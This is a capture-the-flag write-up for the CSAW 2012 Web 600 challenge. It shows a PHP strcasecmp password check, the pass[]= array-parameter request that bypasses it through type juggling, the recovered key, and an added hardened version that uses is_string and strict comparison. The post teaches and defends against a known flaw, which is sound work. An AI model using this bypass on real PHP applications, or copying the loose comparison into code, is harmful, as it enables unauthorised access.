30 Sep 2012

CSAW 2012 – Web 600

No challenge description
http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/

The website
http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/
gives us a directory listing with two files:

[ ]	submit.php	29-Sep-2012 15:54 	224 	 
[ ]	submit.phps	29-Sep-2012 15:56 	224 	 


The source code of the script is shown below.
http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/submit.phps

<?php
    $key = "key{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}";
    $pass = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
    if ( strcasecmp( $_GET['pass'], $pass ) == 0 ) {
        echo($key);
    }
?>

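The attack in this challenge relies on a trick you need to know; some information can be found at:
http://php.net/manual/en/function.strcmp.php

Appending [] to the parameter name makes $_GET['pass'] an array instead of a string. On the PHP versions of the time, strcasecmp() given an array emits a warning and returns NULL rather than an integer, and the loose comparison NULL == 0 evaluates to true, so the key is printed.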

Requesting http://128.238.66.216/eccbc87e4b5ce2fe28308fd9f2a7baf3/submit.php?pass[]= gives us the following reply:

key{this_is_how_our_scoreboard_was_owned_last_night}

KEY: this_is_how_our_scoreboard_was_owned_last_night
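
The comparison from submit.phps beside a hardened version, as an added example that is not part of the original post or the challenge's code. The function names check_loose and check_strict, the secret and the query strings are constructed for illustration.

```php
<?php
// Added example, not the challenge's code. $secret and the query strings are constructed.

// Same comparison as submit.phps. On PHP 5 and 7, strcasecmp() given an array
// emits a warning and returns NULL, and NULL == 0 is true. PHP 8 throws TypeError.
function check_loose($input, $secret) {
    try {
        return @strcasecmp($input, $secret) == 0;
    } catch (TypeError $e) {
        return false; // PHP 8+: the array never reaches the comparison
    }
}

// Hardened: reject anything that is not a string, then compare the result
// with === so that NULL can never be taken for 0.
function check_strict($input, $secret) {
    if (!is_string($input)) {
        return false;
    }
    return strcasecmp($input, $secret) === 0;
}

$secret = 'constructed-secret';
foreach (array('pass=guess', 'pass[]=', 'pass=CONSTRUCTED-SECRET') as $qs) {
    parse_str($qs, $get); // parses the query string the same way PHP fills $_GET
    $input = isset($get['pass']) ? $get['pass'] : null;
    printf("%-26s type=%-6s loose=%-5s strict=%s\n",
        $qs, gettype($input),
        var_export(check_loose($input, $secret), true),
        var_export(check_strict($input, $secret), true));
}
```

Either fix alone closes the hole on PHP 5 and 7; the type check also keeps the handler from throwing on PHP 8.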

{3 Responses to “CSAW 2012 – Web 600”}

  1. What is the trick? I don’t get it… thanks.
    Is register_global on, or what?

    an_animal
  2. Yes
    And the PHP doc says that
    strcmp("foo", array()) => NULL + PHP Warning

    don